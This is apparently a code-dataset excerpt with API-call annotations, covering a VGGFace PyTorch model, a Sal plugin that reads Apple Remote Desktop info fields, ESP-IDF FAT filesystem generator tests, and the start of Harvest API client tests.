"torch... | [((730, 759), 'numpy.rollaxis', 'np.rollaxis', (['img_bgr_fp', '(2)', '(0)'], {}), '(img_bgr_fp, 2, 0)\n', (741, 759), True, 'import numpy as np\n'), ((1862, 1896), 'torchvision.transforms.Compose', 'transforms.Compose', (['transform_list'], {}), '(transform_list)\n', (1880, 1896), True, 'import torchvision.transforms as transforms\n'), ((543, 556), 'numpy.array', 'np.array', (['img'], {}), '(img)\n', (551, 556), True, 'import numpy as np\n'), ((629, 667), 'numpy.array', 'np.array', (['(93.594, 104.7624, 129.1863)'], {}), '((93.594, 104.7624, 129.1863))\n', (637, 667), True, 'import numpy as np\n'), ((1233, 1255), 'torchvision.transforms.Resize', 'transforms.Resize', (['(256)'], {}), '(256)\n', (1250, 1255), True, 'import torchvision.transforms as transforms\n'), ((1809, 1849), 'torchvision.transforms.Lambda', 'transforms.Lambda', (['prepare_vggface_image'], {}), '(prepare_vggface_image)\n', (1826, 1849), True, 'import torchvision.transforms as transforms\n'), ((2411, 2451), 'torch.nn.Conv2d', 'nn.Conv2d', (['(3)', '(64)', '(3, 3)', '(1, 1)', '(1, 1)'], {}), '(3, 64, (3, 3), (1, 1), (1, 1))\n', (2420, 2451), True, 'import torch.nn as nn\n'), ((2471, 2512), 'torch.nn.Conv2d', 'nn.Conv2d', (['(64)', '(64)', '(3, 3)', '(1, 1)', '(1, 1)'], {}), '(64, 64, (3, 3), (1, 1), (1, 1))\n', (2480, 2512), True, 'import torch.nn as nn\n'), ((2533, 2575), 'torch.nn.Conv2d', 'nn.Conv2d', (['(64)', '(128)', '(3, 3)', '(1, 1)', '(1, 1)'], {}), '(64, 128, (3, 3), (1, 1), (1, 1))\n', (2542, 2575), True, 'import torch.nn as nn\n'), ((2595, 2638), 'torch.nn.Conv2d', 'nn.Conv2d', (['(128)', '(128)', '(3, 3)', '(1, 1)', '(1, 1)'], {}), '(128, 128, (3, 3), (1, 1), (1, 1))\n', (2604, 2638), True, 'import torch.nn as nn\n'), ((2659, 2702), 'torch.nn.Conv2d', 'nn.Conv2d', (['(128)', '(256)', '(3, 3)', '(1, 1)', '(1, 1)'], {}), '(128, 256, (3, 3), (1, 1), (1, 1))\n', (2668, 2702), True, 'import torch.nn as nn\n'), ((2722, 2765), 'torch.nn.Conv2d', 'nn.Conv2d', (['(256)', '(256)', '(3, 3)', '(1, 1)', '(1, 1)'], {}), '(256, 256, (3, 3), (1, 1), (1, 1))\n', (2731, 2765), True, 'import torch.nn as nn\n'), ((2785, 2828), 'torch.nn.Conv2d', 'nn.Conv2d', (['(256)', '(256)', '(3, 3)', '(1, 1)', '(1, 1)'], {}), '(256, 256, (3, 3), (1, 1), (1, 1))\n', (2794, 2828), True, 'import torch.nn as nn\n'), ((2849, 2892), 'torch.nn.Conv2d', 'nn.Conv2d', (['(256)', '(512)', '(3, 3)', '(1, 1)', '(1, 1)'], {}), '(256, 512, (3, 3), (1, 1), (1, 1))\n', (2858, 2892), True, 'import torch.nn as nn\n'), ((2912, 2955), 'torch.nn.Conv2d', 'nn.Conv2d', (['(512)', '(512)', '(3, 3)', '(1, 1)', '(1, 1)'], {}), '(512, 512, (3, 3), (1, 1), (1, 1))\n', (2921, 2955), True, 'import torch.nn as nn\n'), ((2975, 3018), 'torch.nn.Conv2d', 'nn.Conv2d', (['(512)', '(512)', '(3, 3)', '(1, 1)', '(1, 1)'], {}), '(512, 512, (3, 3), (1, 1), (1, 1))\n', (2984, 3018), True, 'import torch.nn as nn\n'), ((3039, 3082), 'torch.nn.Conv2d', 'nn.Conv2d', (['(512)', '(512)', '(3, 3)', '(1, 1)', '(1, 1)'], {}), '(512, 512, (3, 3), (1, 1), (1, 1))\n', (3048, 3082), True, 'import torch.nn as nn\n'), ((3102, 3145), 'torch.nn.Conv2d', 'nn.Conv2d', (['(512)', '(512)', '(3, 3)', '(1, 1)', '(1, 1)'], {}), '(512, 512, (3, 3), (1, 1), (1, 1))\n', (3111, 3145), True, 'import torch.nn as nn\n'), ((3165, 3208), 'torch.nn.Conv2d', 'nn.Conv2d', (['(512)', '(512)', '(3, 3)', '(1, 1)', '(1, 1)'], {}), '(512, 512, (3, 3), (1, 1), (1, 1))\n', (3174, 3208), True, 'import torch.nn as nn\n'), ((3225, 3247), 'torch.nn.Linear', 'nn.Linear', (['(25088)', '(4096)'], {}), '(25088, 4096)\n', (3234, 3247), True, 'import torch.nn as nn\n'), ((3266, 3287), 'torch.nn.Linear', 'nn.Linear', (['(4096)', '(4096)'], {}), '(4096, 4096)\n', (3275, 3287), True, 'import torch.nn as nn\n'), ((3306, 3338), 'torch.nn.Linear', 'nn.Linear', (['(4096)', 'self.fc_outputs'], {}), '(4096, self.fc_outputs)\n', (3315, 3338), True, 'import torch.nn as nn\n'), ((3395, 3404), 'torch.nn.ReLU', 'nn.ReLU', ([], {}), '()\n', (3402, 3404), True, 'import torch.nn as nn\n'), ((3428, 3480), 'torch.nn.MaxPool2d', 'nn.MaxPool2d', (['(2, 2)', '(2, 2)', '(0, 0)'], {'ceil_mode': '(True)'}), '((2, 2), (2, 2), (0, 0), ceil_mode=True)\n', (3440, 3480), True, 'import torch.nn as nn\n'), ((3501, 3516), 'torch.nn.Dropout', 'nn.Dropout', (['(0.5)'], {}), '(0.5)\n', (3511, 3516), True, 'import torch.nn as nn\n'), ((5128, 5160), 'torch.nn.Linear', 'nn.Linear', (['(4096)', 'self.fc_outputs'], {}), '(4096, self.fc_outputs)\n', (5137, 5160), True, 'import torch.nn as nn\n'), ((6725, 6752), 'torch.nn.functional.normalize', 'F.normalize', (['e7'], {'p': '(2)', 'dim': '(1)'}), '(e7, p=2, dim=1)\n', (6736, 6752), True, 'import torch.nn.functional as F\n'), ((771, 799), 'torch.from_numpy', 'torch.from_numpy', (['img_bgr_fp'], {}), '(img_bgr_fp)\n', (787, 799), False, 'import torch\n'), ((897, 915), 'numpy.random.random', 'np.random.random', ([], {}), '()\n', (913, 915), True, 'import numpy as np\n'), ((1303, 1336), 'torchvision.transforms.RandomCrop', 'transforms.RandomCrop', (['(224, 224)'], {}), '((224, 224))\n', (1324, 1336), True, 'import torchvision.transforms as transforms\n'), ((1367, 1400), 'torchvision.transforms.RandomHorizontalFlip', 'transforms.RandomHorizontalFlip', ([], {}), '()\n', (1398, 1400), True, 'import torchvision.transforms as transforms\n'), ((1552, 1585), 'torchvision.transforms.CenterCrop', 'transforms.CenterCrop', (['(224, 224)'], {}), '((224, 224))\n', (1573, 1585), True, 'import torchvision.transforms as transforms\n'), ((7002, 7028), 'torch.load', 'torch.load', (['model_filename'], {}), '(model_filename)\n', (7012, 7028), False, 'import torch\n'), ((959, 1003), 'PIL.ImageFilter.GaussianBlur', 'ImageFilter.GaussianBlur', ([], {'radius': 'blur_radius'}), '(radius=blur_radius)\n', (983, 1003), False, 'from PIL import ImageFilter\n')] |
#!/usr/bin/python
import os
import sys
sys.path.append("/usr/local/munki/munkilib")
import FoundationPlist
RESULTS_PATH = "/usr/local/sal/plugin_results.plist"
def main():
ard_path = "/Library/Preferences/com.apple.RemoteDesktop.plist"
if os.path.exists(ard_path):
ard_prefs = FoundationPlist.readPlist(ard_path)
else:
ard_prefs = {}
sal_result_key = "ARD_Info_{}"
prefs_key_prefix = "Text{}"
data = {
sal_result_key.format(i): ard_prefs.get(prefs_key_prefix.format(i), "")
for i in xrange(1, 5)}
formatted_results = {
"plugin": "ARD_Info",
"historical": False,
"data": data}
if os.path.exists(RESULTS_PATH):
plugin_results = FoundationPlist.readPlist(RESULTS_PATH)
else:
plugin_results = []
plugin_results.append(formatted_results)
FoundationPlist.writePlist(plugin_results, RESULTS_PATH)
if __name__ == "__main__":
main() | [
"os.path.exists",
"FoundationPlist.readPlist",
"sys.path.append",
"FoundationPlist.writePlist"
] | [((42, 86), 'sys.path.append', 'sys.path.append', (['"""/usr/local/munki/munkilib"""'], {}), "('/usr/local/munki/munkilib')\n", (57, 86), False, 'import sys\n'), ((254, 278), 'os.path.exists', 'os.path.exists', (['ard_path'], {}), '(ard_path)\n', (268, 278), False, 'import os\n'), ((679, 707), 'os.path.exists', 'os.path.exists', (['RESULTS_PATH'], {}), '(RESULTS_PATH)\n', (693, 707), False, 'import os\n'), ((863, 919), 'FoundationPlist.writePlist', 'FoundationPlist.writePlist', (['plugin_results', 'RESULTS_PATH'], {}), '(plugin_results, RESULTS_PATH)\n', (889, 919), False, 'import FoundationPlist\n'), ((300, 335), 'FoundationPlist.readPlist', 'FoundationPlist.readPlist', (['ard_path'], {}), '(ard_path)\n', (325, 335), False, 'import FoundationPlist\n'), ((734, 773), 'FoundationPlist.readPlist', 'FoundationPlist.readPlist', (['RESULTS_PATH'], {}), '(RESULTS_PATH)\n', (759, 773), False, 'import FoundationPlist\n')] |
#!/usr/bin/env python
# SPDX-FileCopyrightText: 2021-2022 Espressif Systems (Shanghai) CO LTD
# SPDX-License-Identifier: Apache-2.0
import os
import shutil
import sys
import unittest
from subprocess import STDOUT, run
from test_utils import compare_folders, fill_sector, generate_local_folder_structure, generate_test_dir_2
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
import fatfsgen # noqa E402 # pylint: disable=C0413
class FatFSGen(unittest.TestCase):
def setUp(self) -> None:
os.makedirs('output_data')
generate_test_dir_2()
def tearDown(self) -> None:
shutil.rmtree('output_data', ignore_errors=True)
shutil.rmtree('Espressif', ignore_errors=True)
shutil.rmtree('testf', ignore_errors=True)
if os.path.exists('fatfs_image.img'):
os.remove('fatfs_image.img')
@staticmethod
def test_gen_parse() -> None:
run([
'python',
f'{os.path.join(os.path.dirname(__file__), "..", "fatfsgen.py")}',
'output_data/tst_str'
], stderr=STDOUT)
run(['python', '../fatfsgen.py', 'output_data/tst_str'], stderr=STDOUT)
run(['python', '../fatfsparse.py', 'fatfs_image.img'], stderr=STDOUT)
assert set(os.listdir('Espressif')) == {'TEST', 'TESTFILE'}
with open('Espressif/TESTFILE', 'rb') as in_:
assert in_.read() == b'ahoj\n'
assert set(os.listdir('Espressif/TEST')) == {'TEST', 'TESTFIL2'}
with open('Espressif/TEST/TESTFIL2', 'rb') as in_:
assert in_.read() == b'thisistest\n'
assert set(os.listdir('Espressif/TEST/TEST')) == {'LASTFILE.TXT'}
with open('Espressif/TEST/TEST/LASTFILE.TXT', 'rb') as in_:
assert in_.read() == b'deeptest\n'
@staticmethod
def test_file_chaining() -> None:
fatfs = fatfsgen.FATFS()
fatfs.create_file('WRITEF', extension='TXT')
fatfs.write_content(path_from_root=['WRITEF.TXT'], content=4096 * b'a' + b'a')
fatfs.write_filesystem('fatfs_image.img')
run(['python', '../fatfsparse.py', 'fatfs_image.img'], stderr=STDOUT)
with open('Espressif/WRITEF.TXT', 'rb') as in_:
assert in_.read() == 4097 * b'a'
@staticmethod
def test_full_two_sectors_folder() -> None:
fatfs = fatfsgen.FATFS(size=2 * 1024 * 1024)
fatfs.create_directory('TESTFOLD')
for i in range((2 * 4096) // 32):
fatfs.create_file(f'A{str(i).upper()}', path_from_root=['TESTFOLD'])
fatfs.write_content(path_from_root=['TESTFOLD', 'A253'], content=b'later')
fatfs.write_content(path_from_root=['TESTFOLD', 'A255'], content=b'last')
fatfs.write_filesystem('fatfs_image.img')
run(['python', '../fatfsparse.py', 'fatfs_image.img'], stderr=STDOUT)
assert set(os.listdir('Espressif')) == {'TESTFOLD'}
assert set(os.listdir('Espressif/TESTFOLD')) == {f'A{str(i).upper()}' for i in range(256)}
with open('Espressif/TESTFOLD/A253', 'rb') as in_:
assert in_.read() == b'later'
with open('Espressif/TESTFOLD/A255', 'rb') as in_:
assert in_.read() == b'last'
@staticmethod
def test_empty_fat16() -> None:
fatfs = fatfsgen.FATFS(size=17 * 1024 * 1024)
fatfs.write_filesystem('fatfs_image.img')
run(['python', '../fatfsparse.py', 'fatfs_image.img'], stderr=STDOUT)
@staticmethod
def test_chaining_fat16() -> None:
fatfs = fatfsgen.FATFS(size=17 * 1024 * 1024)
fatfs.create_file('WRITEF', extension='TXT')
fatfs.write_content(path_from_root=['WRITEF.TXT'], content=4096 * b'a' + b'a')
fatfs.write_filesystem('fatfs_image.img')
run(['python', '../fatfsparse.py', 'fatfs_image.img'], stderr=STDOUT)
with open('Espressif/WRITEF.TXT', 'rb') as in_:
assert in_.read() == 4097 * b'a'
@staticmethod
def test_full_sector_folder_fat16() -> None:
fatfs = fatfsgen.FATFS(size=17 * 1024 * 1024)
fatfs.create_directory('TESTFOLD')
fill_sector(fatfs)
fatfs.write_content(path_from_root=['TESTFOLD', 'A0'], content=b'first')
fatfs.write_content(path_from_root=['TESTFOLD', 'A126'], content=b'later')
fatfs.write_filesystem('fatfs_image.img')
run(['python', '../fatfsparse.py', 'fatfs_image.img'], stderr=STDOUT)
assert set(os.listdir('Espressif')) == {'TESTFOLD'}
assert set(os.listdir('Espressif/TESTFOLD')) == {f'A{str(i).upper()}' for i in range(128)}
with open('Espressif/TESTFOLD/A0', 'rb') as in_:
assert in_.read() == b'first'
with open('Espressif/TESTFOLD/A126', 'rb') as in_:
assert in_.read() == b'later'
@staticmethod
def file_(x: str, content_: str = 'hey this is a test') -> dict:
return {
'type': 'file',
'name': x,
'content': content_
}
def test_e2e_file(self) -> None:
struct_: dict = {
'type': 'folder',
'name': 'testf',
'content': [self.file_('NEWF')]
}
generate_local_folder_structure(struct_, path_='.')
run([
'python',
f'{os.path.join(os.path.dirname(__file__), "..", "fatfsgen.py")}',
'testf'
], stderr=STDOUT)
run(['python', '../fatfsparse.py', 'fatfs_image.img'], stderr=STDOUT)
assert compare_folders('testf', 'Espressif')
def test_e2e_deeper(self) -> None:
folder_ = {
'type': 'folder',
'name': 'XYZ',
'content': [
self.file_('NEWFLE'),
self.file_('NEW.TXT'),
self.file_('NEWE.TXT'),
self.file_('NEW4.TXT'),
self.file_('NEW5.TXT'),
]
}
struct_: dict = {
'type': 'folder',
'name': 'testf',
'content': [
self.file_('MY_NEW'),
folder_
]
}
generate_local_folder_structure(struct_, path_='.')
run([
'python',
f'{os.path.join(os.path.dirname(__file__), "..", "fatfsgen.py")}',
'testf'
], stderr=STDOUT)
run(['python', '../fatfsparse.py', 'fatfs_image.img'], stderr=STDOUT)
assert compare_folders('testf', 'Espressif')
def test_e2e_deeper_large(self) -> None:
folder_ = {
'type': 'folder',
'name': 'XYZ',
'content': [
self.file_('NEWFLE', content_=4097 * 'a'),
self.file_('NEW.TXT', content_=2 * 4097 * 'a'),
self.file_('NEWE.TXT'),
self.file_('NEW4.TXT'),
self.file_('NEW5.TXT'),
]
}
folder2_ = {
'type': 'folder',
'name': 'XYZ3',
'content': [
self.file_('NEWFLE', content_=4097 * 'a'),
self.file_('NEW.TXT', content_=2 * 4097 * 'a'),
self.file_('NEWE.TXT'),
self.file_('NEW4.TXT'),
self.file_('NEW5.TXT'),
]
}
folder3_ = {
'type': 'folder',
'name': 'XYZ2',
'content': [self.file_(f'A{i}') for i in range(50)]
}
struct_: dict = {
'type': 'folder',
'name': 'testf',
'content': [
self.file_('MY_NEW'),
folder_,
folder2_,
folder3_
]
}
generate_local_folder_structure(struct_, path_='.')
run([
'python',
f'{os.path.join(os.path.dirname(__file__), "..", "fatfsgen.py")}',
'testf'
], stderr=STDOUT)
run(['python', '../fatfsparse.py', 'fatfs_image.img'], stderr=STDOUT)
assert compare_folders('testf', 'Espressif')
def test_e2e_very_deep(self) -> None:
folder_ = {
'type': 'folder',
'name': 'XYZ',
'content': [
self.file_('NEWFLE', content_=4097 * 'a'),
self.file_('NEW.TXT', content_=2 * 4097 * 'a'),
self.file_('NEWE.TXT'),
self.file_('NEW4.TXT'),
self.file_('NEW5.TXT'),
]
}
folder2_ = {
'type': 'folder',
'name': 'XYZ3',
'content': [
self.file_('NEWFLE', content_=4097 * 'a'),
self.file_('NEW.TXT', content_=2 * 4097 * 'a'),
self.file_('NEWE.TXT'),
self.file_('NEW4.TXT'),
self.file_('NEW5.TXT'),
folder_,
]
}
folder3_ = {
'type': 'folder',
'name': 'XYZ2',
'content': [self.file_(f'A{i}') for i in range(50)] + [folder2_]
}
struct_: dict = {
'type': 'folder',
'name': 'testf',
'content': [
self.file_('MY_NEW'),
folder_,
folder2_,
folder3_
]
}
generate_local_folder_structure(struct_, path_='.')
run([
'python',
f'{os.path.join(os.path.dirname(__file__), "..", "fatfsgen.py")}',
'testf'
], stderr=STDOUT)
run(['python', '../fatfsparse.py', 'fatfs_image.img'], stderr=STDOUT)
assert compare_folders('testf', 'Espressif')
def test_e2e_very_deep_long(self) -> None:
folder_ = {
'type': 'folder',
'name': 'veryveryverylong111',
'content': [
self.file_('myndewveryverylongfile1.txt', content_=4097 * 'a'),
self.file_('mynewveryverylongfile22.txt', content_=2 * 4097 * 'a'),
self.file_('mynewveryverylongfile333.txt' * 8),
self.file_('mynewveryverylongfile4444.txt' * 8),
self.file_('mynewveryverylongfile5555.txt'),
self.file_('SHORT.TXT'),
]
}
struct_: dict = {
'type': 'folder',
'name': 'testf',
'content': [
self.file_('mynewveryverylongfile.txt' * 5),
folder_,
]
}
generate_local_folder_structure(struct_, path_='.')
run([
'python',
f'{os.path.join(os.path.dirname(__file__), "..", "fatfsgen.py")}',
'testf', '--long_name_support'
], stderr=STDOUT)
run(['python', '../fatfsparse.py', 'fatfs_image.img', '--long-name-support'], stderr=STDOUT)
assert compare_folders('testf', 'Espressif')
if __name__ == '__main__':
unittest.main()
| [
"os.path.exists",
"fatfsgen.FATFS",
"test_utils.compare_folders",
"os.listdir",
"os.makedirs",
"subprocess.run",
"test_utils.generate_test_dir_2",
"test_utils.fill_sector",
"os.path.dirname",
"test_utils.generate_local_folder_structure",
"shutil.rmtree",
"unittest.main",
"os.remove"
] | [((10738, 10753), 'unittest.main', 'unittest.main', ([], {}), '()\n', (10751, 10753), False, 'import unittest\n'), ((356, 381), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (371, 381), False, 'import os\n'), ((518, 544), 'os.makedirs', 'os.makedirs', (['"""output_data"""'], {}), "('output_data')\n", (529, 544), False, 'import os\n'), ((553, 574), 'test_utils.generate_test_dir_2', 'generate_test_dir_2', ([], {}), '()\n', (572, 574), False, 'from test_utils import compare_folders, fill_sector, generate_local_folder_structure, generate_test_dir_2\n'), ((616, 664), 'shutil.rmtree', 'shutil.rmtree', (['"""output_data"""'], {'ignore_errors': '(True)'}), "('output_data', ignore_errors=True)\n", (629, 664), False, 'import shutil\n'), ((673, 719), 'shutil.rmtree', 'shutil.rmtree', (['"""Espressif"""'], {'ignore_errors': '(True)'}), "('Espressif', ignore_errors=True)\n", (686, 719), False, 'import shutil\n'), ((728, 770), 'shutil.rmtree', 'shutil.rmtree', (['"""testf"""'], {'ignore_errors': '(True)'}), "('testf', ignore_errors=True)\n", (741, 770), False, 'import shutil\n'), ((783, 816), 'os.path.exists', 'os.path.exists', (['"""fatfs_image.img"""'], {}), "('fatfs_image.img')\n", (797, 816), False, 'import os\n'), ((1096, 1167), 'subprocess.run', 'run', (["['python', '../fatfsgen.py', 'output_data/tst_str']"], {'stderr': 'STDOUT'}), "(['python', '../fatfsgen.py', 'output_data/tst_str'], stderr=STDOUT)\n", (1099, 1167), False, 'from subprocess import STDOUT, run\n'), ((1176, 1245), 'subprocess.run', 'run', (["['python', '../fatfsparse.py', 'fatfs_image.img']"], {'stderr': 'STDOUT'}), "(['python', '../fatfsparse.py', 'fatfs_image.img'], stderr=STDOUT)\n", (1179, 1245), False, 'from subprocess import STDOUT, run\n'), ((1857, 1873), 'fatfsgen.FATFS', 'fatfsgen.FATFS', ([], {}), '()\n', (1871, 1873), False, 'import fatfsgen\n'), ((2073, 2142), 'subprocess.run', 'run', (["['python', '../fatfsparse.py', 'fatfs_image.img']"], {'stderr': 'STDOUT'}), "(['python', '../fatfsparse.py', 'fatfs_image.img'], stderr=STDOUT)\n", (2076, 2142), False, 'from subprocess import STDOUT, run\n'), ((2327, 2363), 'fatfsgen.FATFS', 'fatfsgen.FATFS', ([], {'size': '(2 * 1024 * 1024)'}), '(size=2 * 1024 * 1024)\n', (2341, 2363), False, 'import fatfsgen\n'), ((2755, 2824), 'subprocess.run', 'run', (["['python', '../fatfsparse.py', 'fatfs_image.img']"], {'stderr': 'STDOUT'}), "(['python', '../fatfsparse.py', 'fatfs_image.img'], stderr=STDOUT)\n", (2758, 2824), False, 'from subprocess import STDOUT, run\n'), ((3258, 3295), 'fatfsgen.FATFS', 'fatfsgen.FATFS', ([], {'size': '(17 * 1024 * 1024)'}), '(size=17 * 1024 * 1024)\n', (3272, 3295), False, 'import fatfsgen\n'), ((3354, 3423), 'subprocess.run', 'run', (["['python', '../fatfsparse.py', 'fatfs_image.img']"], {'stderr': 'STDOUT'}), "(['python', '../fatfsparse.py', 'fatfs_image.img'], stderr=STDOUT)\n", (3357, 3423), False, 'from subprocess import STDOUT, run\n'), ((3498, 3535), 'fatfsgen.FATFS', 'fatfsgen.FATFS', ([], {'size': '(17 * 1024 * 1024)'}), '(size=17 * 1024 * 1024)\n', (3512, 3535), False, 'import fatfsgen\n'), ((3734, 3803), 'subprocess.run', 'run', (["['python', '../fatfsparse.py', 'fatfs_image.img']"], {'stderr': 'STDOUT'}), "(['python', '../fatfsparse.py', 'fatfs_image.img'], stderr=STDOUT)\n", (3737, 3803), False, 'from subprocess import STDOUT, run\n'), ((3989, 4026), 'fatfsgen.FATFS', 'fatfsgen.FATFS', ([], {'size': '(17 * 1024 * 1024)'}), '(size=17 * 1024 * 1024)\n', (4003, 4026), False, 'import fatfsgen\n'), ((4079, 4097), 'test_utils.fill_sector', 'fill_sector', (['fatfs'], {}), '(fatfs)\n', (4090, 4097), False, 'from test_utils import compare_folders, fill_sector, generate_local_folder_structure, generate_test_dir_2\n'), ((4320, 4389), 'subprocess.run', 'run', (["['python', '../fatfsparse.py', 'fatfs_image.img']"], {'stderr': 'STDOUT'}), "(['python', '../fatfsparse.py', 'fatfs_image.img'], stderr=STDOUT)\n", (4323, 4389), False, 'from subprocess import STDOUT, run\n'), ((5133, 5184), 'test_utils.generate_local_folder_structure', 'generate_local_folder_structure', (['struct_'], {'path_': '"""."""'}), "(struct_, path_='.')\n", (5164, 5184), False, 'from test_utils import compare_folders, fill_sector, generate_local_folder_structure, generate_test_dir_2\n'), ((5354, 5423), 'subprocess.run', 'run', (["['python', '../fatfsparse.py', 'fatfs_image.img']"], {'stderr': 'STDOUT'}), "(['python', '../fatfsparse.py', 'fatfs_image.img'], stderr=STDOUT)\n", (5357, 5423), False, 'from subprocess import STDOUT, run\n'), ((5439, 5476), 'test_utils.compare_folders', 'compare_folders', (['"""testf"""', '"""Espressif"""'], {}), "('testf', 'Espressif')\n", (5454, 5476), False, 'from test_utils import compare_folders, fill_sector, generate_local_folder_structure, generate_test_dir_2\n'), ((6044, 6095), 'test_utils.generate_local_folder_structure', 'generate_local_folder_structure', (['struct_'], {'path_': '"""."""'}), "(struct_, path_='.')\n", (6075, 6095), False, 'from test_utils import compare_folders, fill_sector, generate_local_folder_structure, generate_test_dir_2\n'), ((6265, 6334), 'subprocess.run', 'run', (["['python', '../fatfsparse.py', 'fatfs_image.img']"], {'stderr': 'STDOUT'}), "(['python', '../fatfsparse.py', 'fatfs_image.img'], stderr=STDOUT)\n", (6268, 6334), False, 'from subprocess import STDOUT, run\n'), ((6350, 6387), 'test_utils.compare_folders', 'compare_folders', (['"""testf"""', '"""Espressif"""'], {}), "('testf', 'Espressif')\n", (6365, 6387), False, 'from test_utils import compare_folders, fill_sector, generate_local_folder_structure, generate_test_dir_2\n'), ((7583, 7634), 'test_utils.generate_local_folder_structure', 'generate_local_folder_structure', (['struct_'], {'path_': '"""."""'}), "(struct_, path_='.')\n", (7614, 7634), False, 'from test_utils import compare_folders, fill_sector, generate_local_folder_structure, generate_test_dir_2\n'), ((7804, 7873), 'subprocess.run', 'run', (["['python', '../fatfsparse.py', 'fatfs_image.img']"], {'stderr': 'STDOUT'}), "(['python', '../fatfsparse.py', 'fatfs_image.img'], stderr=STDOUT)\n", (7807, 7873), False, 'from subprocess import STDOUT, run\n'), ((7889, 7926), 'test_utils.compare_folders', 'compare_folders', (['"""testf"""', '"""Espressif"""'], {}), "('testf', 'Espressif')\n", (7904, 7926), False, 'from test_utils import compare_folders, fill_sector, generate_local_folder_structure, generate_test_dir_2\n'), ((9158, 9209), 'test_utils.generate_local_folder_structure', 'generate_local_folder_structure', (['struct_'], {'path_': '"""."""'}), "(struct_, path_='.')\n", (9189, 9209), False, 'from test_utils import compare_folders, fill_sector, generate_local_folder_structure, generate_test_dir_2\n'), ((9379, 9448), 'subprocess.run', 'run', (["['python', '../fatfsparse.py', 'fatfs_image.img']"], {'stderr': 'STDOUT'}), "(['python', '../fatfsparse.py', 'fatfs_image.img'], stderr=STDOUT)\n", (9382, 9448), False, 'from subprocess import STDOUT, run\n'), ((9464, 9501), 'test_utils.compare_folders', 'compare_folders', (['"""testf"""', '"""Espressif"""'], {}), "('testf', 'Espressif')\n", (9479, 9501), False, 'from test_utils import compare_folders, fill_sector, generate_local_folder_structure, generate_test_dir_2\n'), ((10315, 10366), 'test_utils.generate_local_folder_structure', 'generate_local_folder_structure', (['struct_'], {'path_': '"""."""'}), "(struct_, path_='.')\n", (10346, 10366), False, 'from test_utils import compare_folders, fill_sector, generate_local_folder_structure, generate_test_dir_2\n'), ((10559, 10656), 'subprocess.run', 'run', (["['python', '../fatfsparse.py', 'fatfs_image.img', '--long-name-support']"], {'stderr': 'STDOUT'}), "(['python', '../fatfsparse.py', 'fatfs_image.img', '--long-name-support'\n ], stderr=STDOUT)\n", (10562, 10656), False, 'from subprocess import STDOUT, run\n'), ((10667, 10704), 'test_utils.compare_folders', 'compare_folders', (['"""testf"""', '"""Espressif"""'], {}), "('testf', 'Espressif')\n", (10682, 10704), False, 'from test_utils import compare_folders, fill_sector, generate_local_folder_structure, generate_test_dir_2\n'), ((830, 858), 'os.remove', 'os.remove', (['"""fatfs_image.img"""'], {}), "('fatfs_image.img')\n", (839, 858), False, 'import os\n'), ((1266, 1289), 'os.listdir', 'os.listdir', (['"""Espressif"""'], {}), "('Espressif')\n", (1276, 1289), False, 'import os\n'), ((1432, 1460), 'os.listdir', 'os.listdir', (['"""Espressif/TEST"""'], {}), "('Espressif/TEST')\n", (1442, 1460), False, 'import os\n'), ((1613, 1646), 'os.listdir', 'os.listdir', (['"""Espressif/TEST/TEST"""'], {}), "('Espressif/TEST/TEST')\n", (1623, 1646), False, 'import os\n'), ((2844, 2867), 'os.listdir', 'os.listdir', (['"""Espressif"""'], {}), "('Espressif')\n", (2854, 2867), False, 'import os\n'), ((2904, 2936), 'os.listdir', 'os.listdir', (['"""Espressif/TESTFOLD"""'], {}), "('Espressif/TESTFOLD')\n", (2914, 2936), False, 'import os\n'), ((4409, 4432), 'os.listdir', 'os.listdir', (['"""Espressif"""'], {}), "('Espressif')\n", (4419, 4432), False, 'import os\n'), ((4469, 4501), 'os.listdir', 'os.listdir', (['"""Espressif/TESTFOLD"""'], {}), "('Espressif/TESTFOLD')\n", (4479, 4501), False, 'import os\n'), ((976, 1001), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (991, 1001), False, 'import os\n'), ((5249, 5274), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (5264, 5274), False, 'import os\n'), ((6160, 6185), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (6175, 6185), False, 'import os\n'), ((7699, 7724), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (7714, 7724), False, 'import os\n'), ((9274, 9299), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (9289, 9299), False, 'import os\n'), ((10431, 10456), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (10446, 10456), False, 'import os\n')] |
# Copyright 2020 Bradbase
import os, sys
import unittest
import configparser
from dataclasses import asdict
from requests_oauthlib import OAuth2Session
from oauthlib.oauth2 import MobileApplicationClient, WebApplicationClient
import httpretty
import warnings
from dacite import from_dict
import json
sys.path.insert(0, sys.path[0]+"/..")
import harvest
from harvest.harvestdataclasses import *
"""
There is a sample test config.
Copy it, name it test_config.ini and fill it out with your test details.
tests/test_config.ini is already in .gitignore
Just in case, the test config file looks like this:
[PERSONAL ACCESS TOKEN]
url = https://api.harvestapp.com/api/v2
put_auth_in_header = True
personal_token = <PASSWORD> <PASSWORD>
account_id = 1234567
[OAuth2 Implicit Code Grant]
uri = https://api.harvestapp.com/api/v2
client_id = aclientid
auth_url = https://id.getharvest.com/oauth2/authorize
[OAuth2 Authorization Code Grant]
uri = https://api.harvestapp.com/api/v2
client_id = aclientid
client_secret = itsmysecret
auth_url = https://id.getharvest.com/oauth2/authorize
token_url = https://id.getharvest.com/api/v2/oauth2/token
account_id = 1234567
"""
"""
Those who tread this path:-
These tests currently really only test that the default URL has been formed
correctly and that the datatype that gets returned can be typed into the dataclass.
Probably enough but a long way from "comprehensive".
"""
class TestTasks(unittest.TestCase):
def setUp(self):
personal_access_token = PersonalAccessToken('ACCOUNT_NUMBER', 'PERSONAL_ACCESS_TOKEN')
self.harvest = harvest.Harvest('https://api.harvestapp.com/api/v2', personal_access_token)
warnings.filterwarnings("ignore", category=ResourceWarning, message="unclosed.*") # There's a bug in httpretty ATM.
httpretty.enable()
def teardown(self):
httpretty.reset()
httpretty.disable()
def test_tasks(self):
task_8083800_dict = {
"id":8083800,
"name":"Business Development",
"billable_by_default":False,
"default_hourly_rate":0.0,
"is_default":False,
"is_active":True,
"created_at":"2017-06-26T22:08:25Z",
"updated_at":"2017-06-26T22:08:25Z"
}
task_8083369_dict = {
"id":8083369,
"name":"Research",
"billable_by_default":False,
